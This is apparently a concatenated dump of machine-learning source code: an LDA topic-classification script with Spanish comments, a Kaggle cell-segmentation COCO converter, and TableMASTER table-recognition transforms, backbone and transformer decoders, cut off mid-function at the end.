stopwords.extend(['well','such','other','as','many','have','from', 'subject', 're', 'edu', 'use', 'not', 'would', 'say', 'could', '_', 'be', 'know', 'good', 'go', 'get', 'do', 'done', 'try', 'many', 'some', 'nice', 'thank', 'think', 'see', 'rather', 'easy', 'easily', 'lot', 'lack', 'make', 'want', 'seem', 'run', 'need', 'right', 'line', 'even', 'also', 'may', 'take', 'come'])
# # =============================================================================
# # LEMMATIZACION
# # =============================================================================
def lemmatization(texts, allowed_postags=["NOUN", "ADJ", "VERB", "ADV"]):
texts_out = []
doc = nlp(texts)
new_text = []
for token in doc:
if token.pos_ in allowed_postags:
new_text.append(token.lemma_)
final = " ".join(new_text)
texts_out.append(final)
return (texts_out)
def gen_words(lenm_texts):
word_list = [[word for word in simple_preprocess(str(doc)) if word not in stopwords] for doc in lenm_texts]
return (word_list)
def term2id(dic,term):
for i,v in dic.token2id.items():
if i == term:
return v
# =============================================================================
# 1. CARGAMOS MODELO PREENTRENADO LDA
# =============================================================================
temp_file = datapath("model")
lda = gensim.models.LdaModel.load(temp_file)
print("Modelo cargado")
d = WORK_DIR + "\\final_database\\lda_dictionary\\dictionary.txtdic"
load_dic = corpora.Dictionary.load(d)
# =============================================================================
# 2. PARA CADA DOCUMENTO DE LA BASE DE DATOS
# =============================================================================
# Función que convierte un texto en una salida para calcular probabilidad
# de pertenecer a un tópico
def doc_2_bow(textos):
lemmatized_texts = lemmatization(textos)
data_words = gen_words(lemmatized_texts)
dic = corpora.Dictionary(data_words)
corpus = []
for text in data_words:
new = dic.doc2bow(text)
corpus.append(new)
return corpus
# Medimos tiempo inicio ejecución
inicio = time.time()
# =============================================================================
# CALCULO DE LA PROBABILIDAD
# =============================================================================
# TEXTOS COMPLETOS
w = WORK_DIR + "\\final_database\\text"
onlyfiles = listdir(w)
cont = 1
CICLOS = len(onlyfiles)
# Para cada uno de los archivos de la base de datos TEXT
for file in onlyfiles:
if cont % 10000 == 0:
print("{}/{}".format(cont,CICLOS))
obj = json.load(open(w+"/"+file))
# Para cada sección text del abstract(si es modo text solo tiene 1 sección)
for t in obj["abstract"]:
text = t["text"]
# Lo convertimos en BoW
corpus = doc_2_bow(text)
# Obtenemos del modelo la matriz de probabilidad topico por documento
topic_distribution_document = lda.get_document_topics(corpus,minimum_probability=None)
# Obtenemos el topic on mayor probabilidad
main_topic = str(max(topic_distribution_document[0],key=lambda item:item[1])[0])
# Añadimos tópic y color asociado al JSON del documento
obj["abstract"][0]["topic"]= main_topic
obj["abstract"][0]["color"] = color_list[str(main_topic)]
# Guardamos doc JSON preprocesado en nueva carpeta TEXTO COMPLETO
open(w+"/"+file, "w").write(
json.dumps(obj, indent=4, separators=(',', ': '))
)
cont +=1
print("TEXTOS COMPLETOS CLASIFICADOS")
# TEXTOS POR FRASES
q = WORK_DIR + "\\final_database\\phrases"
onlyfiles = listdir(q)
cont = 1
# Para cada uno de los archivos de la base de datos TEXT
for file in onlyfiles:
if cont % 100 == 0:
print(cont)
obj = json.load(open(q+"/"+file))
# Para cada sección text del abstract(si es modo text solo tiene 1 sección)
for t in obj["abstract"]:
text = t["text"]
# Obtenemos lista de términos
term_list = gen_words(lemmatization(text))
# Obtenemos corpus del documento
corpus = doc_2_bow(text)
# Obtenemos del modelo la lista de probabilidad topico por documento
p_x_d = lda.get_document_topics(corpus,minimum_probability=None)
# Obtenemos del modelo la matriz de probabilidad término por tópico
p_t_x = lda.get_topics()
# Creamos la matriz probabilidad(numero topicos del modelo/número terminos de la frase)
matrix_p = np.zeros((NUM_TOPICS,len(term_list[0])))
# Para cada palabra lemmatizada de la frase miramos sus probabilidades de pertenecer a un tópico
# usaremos un filtro de 1e-8
col = 0
for w in term_list[0]:
# Calculamos el identificador del término en el corpus
w_id = term2id(load_dic, w)
# Si el término existe en el corpus calculamos probabilidad
if w_id != None:
# Para cada tópico que aparezca en relación al documento(que aparezcan)
for k in p_x_d[0]:
n_topic, prob = k
# Para un término calculamos su probabilidad segun el tópico
prob_termino= prob * p_t_x[n_topic][w_id]
matrix_p[n_topic][col] = prob_termino
col+=1
# Normalizamos
suma = 0
# Sumamos la columna de la matriz(término/tópico)
# si es 1 no lo sumamos y luego dividimos la suma entre
s = np.sum(matrix_p, axis=0)
# Normalizamos dividiendo cada columnda por el total
filas,columnas = matrix_p.shape
for i in range(filas):
for j in range(columnas):
if matrix_p[i,j] != 0:
matrix_p[i][j] = matrix_p[i][j] / s[j]
# Aplicamos logaritmos para evitar underflow
matrix_p=np.log(matrix_p,where=0<matrix_p)
matrix_p = np.sum(matrix_p, axis=1)
# Se puede dar el caso que la frase este entera conformada por palabras fuera del
# corpus del modelo, en cuyo caso no pertenecen a ningun topic y no se las puede clasifica
# le damos entonces topic 0 que es indefinido
total = np.sum(matrix_p)
if total != 0:
main_topic = matrix_p.argmax() +1
else:
main_topic=0
# Añadimos tópic y color asociado al JSON del documento
t["topic"]= str(main_topic)
t["color"] = color_list[str(main_topic)]
# Guardamos doc JSON preprocesado en nueva carpeta TEXTO COMPLETO
open(q+"/"+file, "w").write(
json.dumps(obj, indent=4, separators=(',', ': '))
)
cont +=1
print("TEXTOS POR FRASES CLASIFICADOS")
```
|
{
"source": "Jessmin/mmdetection-Competition",
"score": 2
}
|
#### File: mmdetection-Competition/Sartorius/convert_dataset.py
```python
from sklearn.model_selection import train_test_split
import pandas as pd
import numpy as np
import pandas as pd
from tqdm import tqdm
from pycocotools import mask as maskUtils
import json
base_dir = '/home/zhaohj/Documents/dataset/Kaggle/sartorius-cell-instance-segmentation'
def get_info(df):
cat_ids = {name: id+1 for id, name in enumerate(df.cell_type.unique())}
cats = [{'name': name, 'id': id} for name, id in cat_ids.items()]
return cat_ids, cats
def coco_structure(df, cat_ids, cats):
images = [{'id': id, 'width': row.width, 'height': row.height, 'file_name': f'train/{id}.png'}
for id, row in df.groupby('id').agg('first').iterrows()]
annotations = []
for idx, row in tqdm(df.iterrows(), total=len(df)):
mask = rle2mask(row['annotation'], row['width'], row['height'])
c_rle = maskUtils.encode(mask)
c_rle['counts'] = c_rle['counts'].decode('utf-8')
area = maskUtils.area(c_rle).item()
bbox = maskUtils.toBbox(c_rle).astype(int).tolist()
annotation = {
'segmentation': c_rle,
'bbox': bbox,
'area': area,
'image_id': row['id'],
'category_id': cat_ids[row['cell_type']],
'iscrowd': 0,
'id': idx
}
annotations.append(annotation)
return {'categories': cats, 'images': images, 'annotations': annotations}
def rle2mask(rle, img_w, img_h):
array = np.fromiter(rle.split(), dtype=np.uint)
array = array.reshape((-1, 2)).T
array[0] = array[0] - 1
starts, lenghts = array
mask_decompressed = np.concatenate(
[np.arange(s, s + l, dtype=np.uint) for s, l in zip(starts, lenghts)])
msk_img = np.zeros(img_w * img_h, dtype=np.uint8)
msk_img[mask_decompressed] = 1
msk_img = msk_img.reshape((img_h, img_w))
msk_img = np.asfortranarray(msk_img)
return msk_img
def run():
df = pd.read_csv(f'{base_dir}/train.csv')
cat_ids, cats = get_info(df)
print(cats)
# train_df, val_df = train_test_split(df, train_size=0.9, random_state=0)
# train = coco_structure(train_df, cat_ids, cats)
# val = coco_structure(val_df, cat_ids, cats)
# with open(f'{base_dir}/COCO/train.json', 'w') as f:
# json.dump(train, f, ensure_ascii=True, indent=4)
# with open(f'{base_dir}/COCO/val.json', 'w') as f:
# json.dump(val, f, ensure_ascii=True, indent=4)
run()
```
|
{
"source": "Jessmin/TableMASTER-mmocr",
"score": 3
}
|
#### File: datasets/pipelines/table_transforms.py
```python
from mmdet.datasets.builder import PIPELINES
import os
import cv2
import random
import numpy as np
def visual_table_resized_bbox(results):
bboxes = results['img_info']['bbox']
img = results['img']
for bbox in bboxes:
img = cv2.rectangle(img, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), (0, 255, 0), thickness=1)
return img
def visual_table_xywh_bbox(results):
img = results['img']
bboxes = results['img_info']['bbox']
for bbox in bboxes:
draw_bbox = np.empty_like(bbox)
draw_bbox[0] = bbox[0] - bbox[2] / 2
draw_bbox[1] = bbox[1] - bbox[3] / 2
draw_bbox[2] = bbox[0] + bbox[2] / 2
draw_bbox[3] = bbox[1] + bbox[3] / 2
img = cv2.rectangle(img, (int(draw_bbox[0]), int(draw_bbox[1])), (int(draw_bbox[2]), int(draw_bbox[3])), (0, 255, 0), thickness=1)
return img
@PIPELINES.register_module()
class TableResize:
"""Image resizing and padding for Table Recognition OCR, Table Structure Recognition.
Args:
height (int | tuple(int)): Image height after resizing.
min_width (none | int | tuple(int)): Image minimum width
after resizing.
max_width (none | int | tuple(int)): Image maximum width
after resizing.
keep_aspect_ratio (bool): Keep image aspect ratio if True
during resizing, Otherwise resize to the size height *
max_width.
img_pad_value (int): Scalar to fill padding area.
width_downsample_ratio (float): Downsample ratio in horizontal
direction from input image to output feature.
backend (str | None): The image resize backend type. Options are `cv2`,
`pillow`, `None`. If backend is None, the global imread_backend
specified by ``mmcv.use_backend()`` will be used. Default: None.
"""
def __init__(self,
img_scale=None,
min_size=None,
ratio_range=None,
interpolation=None,
keep_ratio=True,
long_size=None):
self.img_scale = img_scale
self.min_size = min_size
self.ratio_range = ratio_range
self.interpolation = cv2.INTER_LINEAR
self.long_size = long_size
self.keep_ratio = keep_ratio
def _get_resize_scale(self, w, h):
if self.keep_ratio:
if self.img_scale is None and isinstance(self.ratio_range, list):
choice_ratio = random.uniform(self.ratio_range[0], self.ratio_range[1])
return (int(w * choice_ratio), int(h * choice_ratio))
elif isinstance(self.img_scale, tuple) and -1 in self.img_scale:
if self.img_scale[0] == -1:
resize_w = w / h * self.img_scale[1]
return (int(resize_w), self.img_scale[1])
else:
resize_h = h / w * self.img_scale[0]
return (self.img_scale[0], int(resize_h))
else:
return (int(w), int(h))
else:
if isinstance(self.img_scale, tuple):
return self.img_scale
else:
raise NotImplementedError
def _resize_bboxes(self, results):
img_shape = results['img_shape']
if 'img_info' in results.keys():
# train and validate phase
if results['img_info'].get('bbox', None) is not None:
bboxes = results['img_info']['bbox']
scale_factor = results['scale_factor']
# bboxes[..., 0::2], bboxes[..., 1::2] = \
# bboxes[..., 0::2] * scale_factor[1], bboxes[..., 1::2] * scale_factor[0]
bboxes[..., 0::2] = np.clip(bboxes[..., 0::2] * scale_factor[1], 0, img_shape[1]-1)
bboxes[..., 1::2] = np.clip(bboxes[..., 1::2] * scale_factor[0], 0, img_shape[0]-1)
results['img_info']['bbox'] = bboxes
else:
raise ValueError('results should have bbox keys.')
else:
# testing phase
pass
def _resize_img(self, results):
img = results['img']
h, w, _ = img.shape
if self.min_size is not None:
if w > h:
w = self.min_size / h * w
h = self.min_size
else:
h = self.min_size / w * h
w = self.min_size
if self.long_size is not None:
if w < h:
w = self.long_size / h * w
h = self.long_size
else:
h = self.long_size / w * h
w = self.long_size
img_scale = self._get_resize_scale(w, h)
resize_img = cv2.resize(img, img_scale, interpolation=self.interpolation)
scale_factor = (resize_img.shape[0] / img.shape[0], resize_img.shape[1] / img.shape[1])
results['img'] = resize_img
results['img_shape'] = resize_img.shape
results['pad_shape'] = resize_img.shape
results['scale_factor'] = scale_factor
results['keep_ratio'] = self.keep_ratio
def __call__(self, results):
self._resize_img(results)
self._resize_bboxes(results)
return results
@PIPELINES.register_module()
class TablePad:
"""Pad the image & mask.
Two padding modes:
(1) pad to fixed size.
(2) pad to the minium size that is divisible by some number.
"""
def __init__(self,
size=None,
size_divisor=None,
pad_val=None,
keep_ratio=False,
return_mask=False,
mask_ratio=2,
train_state=True,
):
self.size = size[::-1]
self.size_divisor = size_divisor
self.pad_val = pad_val
self.keep_ratio = keep_ratio
self.return_mask = return_mask
self.mask_ratio = mask_ratio
self.training = train_state
# only one of size or size_divisor is valid.
assert size is not None or size_divisor is not None
assert size is None or size_divisor is None
def _pad(self, img, size, pad_val):
if not isinstance(size, tuple):
raise NotImplementedError
if len(size) < len(img.shape):
shape = size + (img.shape[-1], )
else:
shape = size
pad = np.empty(shape, dtype=img.dtype)
pad[...] = pad_val
h, w = img.shape[:2]
size_w, size_h = size[:2]
if h > size_h or w > size_w:
if self.keep_ratio:
if h / size_h > w / size_w:
size = (int(w / h * size_h), size_h)
else:
size = (size_w, int(h / w * size_w))
img = cv2.resize(img, size[::-1], cv2.INTER_LINEAR)
pad[:img.shape[0], :img.shape[1], ...] = img
if self.return_mask:
mask = np.empty(size, dtype=img.dtype)
mask[...] = 0
mask[:img.shape[0], :img.shape[1]] = 1
# mask_ratio is mean stride of backbone in (height, width)
if isinstance(self.mask_ratio, int):
mask = mask[::self.mask_ratio, ::self.mask_ratio]
elif isinstance(self.mask_ratio, tuple):
mask = mask[::self.mask_ratio[0], ::self.mask_ratio[1]]
else:
raise NotImplementedError
mask = np.expand_dims(mask, axis=0)
else:
mask = None
return pad, mask
def _divisor(self, img, size_divisor, pad_val):
pass
def _pad_img(self, results):
if self.size is not None:
padded_img, mask = self._pad(results['img'], self.size, self.pad_val)
elif self.size_divisor is not None:
raise NotImplementedError
results['img'] = padded_img
results['mask'] = mask
results['pad_shape'] = padded_img.shape
results['pad_fixed_size'] = self.size
results['pad_size_divisor'] = self.size_divisor
def __call__(self, results):
self._pad_img(results)
#visual_img = visual_table_resized_bbox(results)
#cv2.imwrite('/data_0/cache/{}_visual.jpg'.format(os.path.basename(results['filename']).split('.')[0]), visual_img)
# if self.training:
# scaleBbox(results)
return results
def __repr__(self):
repr_str = self.__class__.__name__
repr_str += '(size={}, size_divisor={}, pad_val={})'.format(
self.size, self.size_divisor, self.pad_val)
return repr_str
def xyxy2xywh(bboxes):
"""
Convert coord (x1,y1,x2,y2) to (x,y,w,h).
where (x1,y1) is top-left, (x2,y2) is bottom-right.
(x,y) is bbox center and (w,h) is width and height.
:param bboxes: (x1, y1, x2, y2)
:return:
"""
new_bboxes = np.empty_like(bboxes)
new_bboxes[..., 0] = (bboxes[..., 0] + bboxes[..., 2]) / 2 # x center
new_bboxes[..., 1] = (bboxes[..., 1] + bboxes[..., 3]) / 2 # y center
new_bboxes[..., 2] = bboxes[..., 2] - bboxes[..., 0] # width
new_bboxes[..., 3] = bboxes[..., 3] - bboxes[..., 1] # height
return new_bboxes
def normalize_bbox(bboxes, img_shape):
bboxes[..., 0], bboxes[..., 2] = bboxes[..., 0] / img_shape[1], bboxes[..., 2] / img_shape[1]
bboxes[..., 1], bboxes[..., 3] = bboxes[..., 1] / img_shape[0], bboxes[..., 3] / img_shape[0]
return bboxes
@PIPELINES.register_module()
class TableBboxEncode:
"""Encode table bbox for training.
convert coord (x1,y1,x2,y2) to (x,y,w,h)
normalize to (0,1)
adjust key 'bbox' and 'bbox_mask' location in dictionary 'results'
"""
def __init__(self):
pass
def __call__(self, results):
bboxes = results['img_info']['bbox']
bboxes = xyxy2xywh(bboxes)
img_shape = results['img'].shape
bboxes = normalize_bbox(bboxes, img_shape)
flag = self.check_bbox_valid(bboxes)
if not flag:
print('Box invalid in {}'.format(results['filename']))
results['img_info']['bbox'] = bboxes
self.adjust_key(results)
# self.visual_normalized_bbox(results)
return results
def __repr__(self):
repr_str = self.__class__.__name__
return repr_str
def check_bbox_valid(self, bboxes):
low = (bboxes >= 0.) * 1
high = (bboxes <= 1.) * 1
matrix = low + high
for idx, m in enumerate(matrix):
if m.sum() != 8:
return False
return True
def visual_normalized_bbox(self, results):
"""
visual after normalized bbox in results.
:param results:
:return:
"""
save_path = '/data_0/cache/{}_normalized.jpg'.\
format(os.path.basename(results['filename']).split('.')[0])
img = results['img']
img_shape = img.shape
# x,y,w,h
bboxes = results['img_info']['bbox']
bboxes[..., 0::2] = bboxes[..., 0::2] * img_shape[1]
bboxes[..., 1::2] = bboxes[..., 1::2] * img_shape[0]
# x,y,x,y
new_bboxes = np.empty_like(bboxes)
new_bboxes[..., 0] = bboxes[..., 0] - bboxes[..., 2] / 2
new_bboxes[..., 1] = bboxes[..., 1] - bboxes[..., 3] / 2
new_bboxes[..., 2] = bboxes[..., 0] + bboxes[..., 2] / 2
new_bboxes[..., 3] = bboxes[..., 1] + bboxes[..., 3] / 2
# draw
for new_bbox in new_bboxes:
img = cv2.rectangle(img, (int(new_bbox[0]), int(new_bbox[1])),
(int(new_bbox[2]), int(new_bbox[3])), (0, 255, 0), thickness=1)
cv2.imwrite(save_path, img)
def adjust_key(self, results):
"""
Adjust key 'bbox' and 'bbox_mask' location in dictionary 'results'.
:param results:
:return:
"""
bboxes = results['img_info'].pop('bbox')
bboxes_masks = results['img_info'].pop('bbox_masks')
results['bbox'] = bboxes
results['bbox_masks'] = bboxes_masks
return results
```
#### File: textrecog/backbones/resnet_extra.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmdet.models.builder import BACKBONES
from ..layers.context_block import ContextBlock
def conv3x3(in_planes, out_planes, stride=1):
""" 3x3 convolution with padding """
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False)
def conv1x1(in_planes, out_planes, stride=1):
""" 1x1 convolution """
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None, gcb_config=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes, momentum=0.9)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes, momentum=0.9)
self.downsample = downsample
self.stride = stride
self.gcb_config = gcb_config
if self.gcb_config is not None:
gcb_ratio = gcb_config['ratio']
gcb_headers = gcb_config['headers']
att_scale = gcb_config['att_scale']
fusion_type = gcb_config['fusion_type']
self.context_block = ContextBlock(inplanes=planes,
ratio=gcb_ratio,
headers=gcb_headers,
att_scale=att_scale,
fusion_type=fusion_type)
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.gcb_config is not None:
out = self.context_block(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
def get_gcb_config(gcb_config, layer):
if gcb_config is None or not gcb_config['layers'][layer]:
return None
else:
return gcb_config
@BACKBONES.register_module()
class ResNetExtra(nn.Module):
def __init__(self, layers, input_dim=3, gcb_config=None):
assert len(layers) >= 4
super(ResNetExtra, self).__init__()
self.inplanes = 128
self.conv1 = nn.Conv2d(input_dim, 64, kernel_size=3, stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu1 = nn.ReLU(inplace=True)
self.conv2 = nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(128)
self.relu2 = nn.ReLU(inplace=True)
self.maxpool1 = nn.MaxPool2d(kernel_size=2, stride=2)
self.layer1 = self._make_layer(BasicBlock, 256, layers[0], stride=1, gcb_config=get_gcb_config(gcb_config, 0))
self.conv3 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1, bias=False)
self.bn3 = nn.BatchNorm2d(256)
self.relu3 = nn.ReLU(inplace=True)
self.maxpool2 = nn.MaxPool2d(kernel_size=2, stride=2)
self.layer2 = self._make_layer(BasicBlock, 256, layers[1], stride=1, gcb_config=get_gcb_config(gcb_config, 1))
self.conv4 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1, bias=False)
self.bn4 = nn.BatchNorm2d(256)
self.relu4 = nn.ReLU(inplace=True)
self.maxpool3 = nn.MaxPool2d(kernel_size=(2,1), stride=(2,1))
self.layer3 = self._make_layer(BasicBlock, 512, layers[2], stride=1, gcb_config=get_gcb_config(gcb_config, 2))
self.conv5 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1, bias=False)
self.bn5 = nn.BatchNorm2d(512)
self.relu5 = nn.ReLU(inplace=True)
self.layer4 = self._make_layer(BasicBlock, 512, layers[3], stride=1, gcb_config=get_gcb_config(gcb_config, 3))
self.conv6 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1, bias=False)
self.bn6 = nn.BatchNorm2d(512)
self.relu6 = nn.ReLU(inplace=True)
def init_weights(self, pretrained=None):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def _make_layer(self, block, planes, blocks, stride=1, gcb_config=None):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, gcb_config=gcb_config))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
f = []
x = self.conv1(x)
x = self.bn1(x)
x = self.relu1(x)
x = self.conv2(x)
x = self.bn2(x)
x = self.relu2(x)
# (48, 160)
x = self.maxpool1(x)
x = self.layer1(x)
x = self.conv3(x)
x = self.bn3(x)
x = self.relu3(x)
f.append(x)
# (24, 80)
x = self.maxpool2(x)
x = self.layer2(x)
x = self.conv4(x)
x = self.bn4(x)
x = self.relu4(x)
f.append(x)
# (12, 40)
x = self.maxpool3(x)
x = self.layer3(x)
x = self.conv5(x)
x = self.bn5(x)
x = self.relu5(x)
x = self.layer4(x)
x = self.conv6(x)
x = self.bn6(x)
x = self.relu6(x)
f.append(x)
# (6, 40)
return f
```
#### File: textrecog/decoders/master_decoder.py
```python
import math
import copy
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmocr.models.builder import DECODERS
from .base_decoder import BaseDecoder
from ..encoders.positional_encoding import PositionalEncoding
from mmocr.models.builder import DECODERS
class Embeddings(nn.Module):
def __init__(self, d_model, vocab):
super(Embeddings, self).__init__()
self.lut = nn.Embedding(vocab, d_model)
self.d_model = d_model
def forward(self, *input):
x = input[0]
return self.lut(x) * math.sqrt(self.d_model)
def clones(module, N):
""" Produce N identical layers """
return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])
class SubLayerConnection(nn.Module):
"""
A residual connection followed by a layer norm.
Note for code simplicity the norm is first as opposed to last.
"""
def __init__(self, size, dropout):
super(SubLayerConnection, self).__init__()
self.norm = nn.LayerNorm(size)
self.dropout = nn.Dropout(dropout)
def forward(self, x, sublayer):
tmp = self.norm(x)
tmp = sublayer(tmp)
return x + self.dropout(sublayer(self.norm(x)))
class FeedForward(nn.Module):
def __init__(self, d_model, d_ff, dropout):
super(FeedForward, self).__init__()
self.w_1 = nn.Linear(d_model, d_ff)
self.w_2 = nn.Linear(d_ff, d_model)
self.dropout = nn.Dropout(dropout)
def forward(self, x):
return self.w_2(self.dropout(F.relu(self.w_1(x))))
def self_attention(query, key, value, mask=None, dropout=None):
"""
Compute 'Scale Dot Product Attention'
"""
d_k = value.size(-1)
score = torch.matmul(query, key.transpose(-2, -1) / math.sqrt(d_k))
if mask is not None:
#score = score.masked_fill(mask == 0, -1e9) # b, h, L, L
score = score.masked_fill(mask == 0, -6.55e4) # for fp16
p_attn = F.softmax(score, dim=-1)
if dropout is not None:
p_attn = dropout(p_attn)
return torch.matmul(p_attn, value), p_attn
class MultiHeadAttention(nn.Module):
def __init__(self, headers, d_model, dropout):
super(MultiHeadAttention, self).__init__()
assert d_model % headers == 0
self.d_k = int(d_model / headers)
self.headers = headers
self.linears = clones(nn.Linear(d_model, d_model), 4)
self.attn = None
self.dropout = nn.Dropout(dropout)
def forward(self, query, key, value, mask=None):
nbatches = query.size(0)
# 1) Do all the linear projections in batch from d_model => h x d_k
query, key, value = \
[l(x).view(nbatches, -1, self.headers, self.d_k).transpose(1, 2)
for l,x in zip(self.linears, (query, key, value))]
# 2) Apply attention on all the projected vectors in batch
x, self.attn = self_attention(query, key, value, mask=mask, dropout=self.dropout)
x = x.transpose(1, 2).contiguous().view(nbatches, -1, self.headers * self.d_k)
return self.linears[-1](x)
class DecoderLayer(nn.Module):
"""
Decoder is made of self attention, srouce attention and feed forward.
"""
def __init__(self, size, self_attn, src_attn, feed_forward, dropout):
super(DecoderLayer, self).__init__()
self.size = size
self.self_attn = MultiHeadAttention(**self_attn)
self.src_attn = MultiHeadAttention(**src_attn)
self.feed_forward = FeedForward(**feed_forward)
self.sublayer = clones(SubLayerConnection(size, dropout), 3)
def forward(self, x, feature, src_mask, tgt_mask):
x = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, tgt_mask))
x = self.sublayer[1](x, lambda x: self.src_attn(x, feature, feature, src_mask))
return self.sublayer[2](x, self.feed_forward)
@DECODERS.register_module()
class MasterDecoder(BaseDecoder):
def __init__(self,
N,
decoder,
d_model,
num_classes,
start_idx,
padding_idx,
max_seq_len,
):
super(MasterDecoder, self).__init__()
self.layers = clones(DecoderLayer(**decoder), N)
self.norm = nn.LayerNorm(decoder.size)
self.fc = nn.Linear(d_model, num_classes)
self.embedding = Embeddings(d_model=d_model, vocab=num_classes)
self.positional_encoding = PositionalEncoding(d_model=d_model)
self.SOS = start_idx
self.PAD = padding_idx
self.max_length = max_seq_len
def make_mask(self, src, tgt):
"""
Make mask for self attention.
:param src: [b, c, h, l_src]
:param tgt: [b, l_tgt]
:return:
"""
trg_pad_mask = (tgt != self.PAD).unsqueeze(1).unsqueeze(3).byte()
tgt_len = tgt.size(1)
trg_sub_mask = torch.tril(torch.ones((tgt_len, tgt_len), dtype=torch.uint8, device=src.device))
tgt_mask = trg_pad_mask & trg_sub_mask
return None, tgt_mask
def decode(self, input, feature, src_mask, tgt_mask):
# main process of transformer decoder.
x = self.embedding(input)
x = self.positional_encoding(x)
for i, layer in enumerate(self.layers):
x = layer(x, feature, src_mask, tgt_mask)
x = self.norm(x)
return self.fc(x)
def greedy_forward(self, SOS, feature, mask):
input = SOS
output = None
for i in range(self.max_length+1):
_, target_mask = self.make_mask(feature, input)
out = self.decode(input, feature, None, target_mask)
#out = self.decoder(input, feature, None, target_mask)
output = out
prob = F.softmax(out, dim=-1)
_, next_word = torch.max(prob, dim=-1)
input = torch.cat([input, next_word[:, -1].unsqueeze(-1)], dim=1)
return output
def forward_train(self, feat, out_enc, targets_dict, img_metas=None):
# x is token of label
# feat is feature after backbone before pe.
# out_enc is feature after pe.
device = feat.device
if isinstance(targets_dict, dict):
padded_targets = targets_dict['padded_targets'].to(device)
else:
padded_targets = targets_dict.to(device)
src_mask = None
_, tgt_mask = self.make_mask(out_enc, padded_targets[:,:-1])
return self.decode(padded_targets[:, :-1], out_enc, src_mask, tgt_mask)
def forward_test(self, feat, out_enc, img_metas):
src_mask = None
batch_size = out_enc.shape[0]
SOS = torch.zeros(batch_size).long().to(out_enc.device)
SOS[:] = self.SOS
SOS = SOS.unsqueeze(1)
output = self.greedy_forward(SOS, out_enc, src_mask)
return output
def forward(self,
feat,
out_enc,
targets_dict=None,
img_metas=None,
train_mode=True):
self.train_mode = train_mode
if train_mode:
return self.forward_train(feat, out_enc, targets_dict, img_metas)
return self.forward_test(feat, out_enc, img_metas)
@DECODERS.register_module()
class TableMasterDecoder(BaseDecoder):
"""
Split to two transformer header at the last layer.
Cls_layer is used to structure token classification.
Bbox_layer is used to regress bbox coord.
"""
def __init__(self,
N,
decoder,
d_model,
num_classes,
start_idx,
padding_idx,
max_seq_len,
):
super(TableMasterDecoder, self).__init__()
self.layers = clones(DecoderLayer(**decoder), N-1)
self.cls_layer = clones(DecoderLayer(**decoder), 1)
self.bbox_layer = clones(DecoderLayer(**decoder), 1)
self.cls_fc = nn.Linear(d_model, num_classes)
self.bbox_fc = nn.Sequential(
nn.Linear(d_model, 4),
nn.Sigmoid()
)
self.norm = nn.LayerNorm(decoder.size)
self.embedding = Embeddings(d_model=d_model, vocab=num_classes)
self.positional_encoding = PositionalEncoding(d_model=d_model)
self.SOS = start_idx
self.PAD = padding_idx
self.max_length = max_seq_len
def make_mask(self, src, tgt):
"""
Make mask for self attention.
:param src: [b, c, h, l_src]
:param tgt: [b, l_tgt]
:return:
"""
trg_pad_mask = (tgt != self.PAD).unsqueeze(1).unsqueeze(3).byte()
tgt_len = tgt.size(1)
trg_sub_mask = torch.tril(torch.ones((tgt_len, tgt_len), dtype=torch.uint8, device=src.device))
tgt_mask = trg_pad_mask & trg_sub_mask
return None, tgt_mask
def decode(self, input, feature, src_mask, tgt_mask):
# main process of transformer decoder.
x = self.embedding(input)
x = self.positional_encoding(x)
# origin transformer layers
for i, layer in enumerate(self.layers):
x = layer(x, feature, src_mask, tgt_mask)
# cls head
for layer in self.cls_layer:
cls_x = layer(x, feature, src_mask, tgt_mask)
cls_x = self.norm(cls_x)
# bbox head
for layer in self.bbox_layer:
bbox_x = layer(x, feature, src_mask, tgt_mask)
bbox_x = self.norm(bbox_x)
return self.cls_fc(cls_x), self.bbox_fc(bbox_x)
def greedy_forward(self, SOS, feature, mask):
input = SOS
output = None
for i in range(self.max_length+1):
_, target_mask = self.make_mask(feature, input)
out, bbox_output = self.decode(input, feature, None, target_mask)
output = out
prob = F.softmax(out, dim=-1)
_, next_word = torch.max(prob, dim=-1)
input = torch.cat([input, next_word[:, -1].unsqueeze(-1)], dim=1)
return output, bbox_output
def forward_train(self, feat, out_enc, targets_dict, img_metas=None):
# x is token of label
# feat is feature after backbone before pe.
# out_enc is feature after pe.
device = feat.device
if isinstance(targets_dict, dict):
padded_targets = targets_dict['padded_targets'].to(device)
else:
padded_targets = targets_dict.to(device)
src_mask = None
_, tgt_mask = self.make_mask(out_enc, padded_targets[:,:-1])
return self.decode(padded_targets[:, :-1], out_enc, src_mask, tgt_mask)
def forward_test(self, feat, out_enc, img_metas):
src_mask = None
batch_size = out_enc.shape[0]
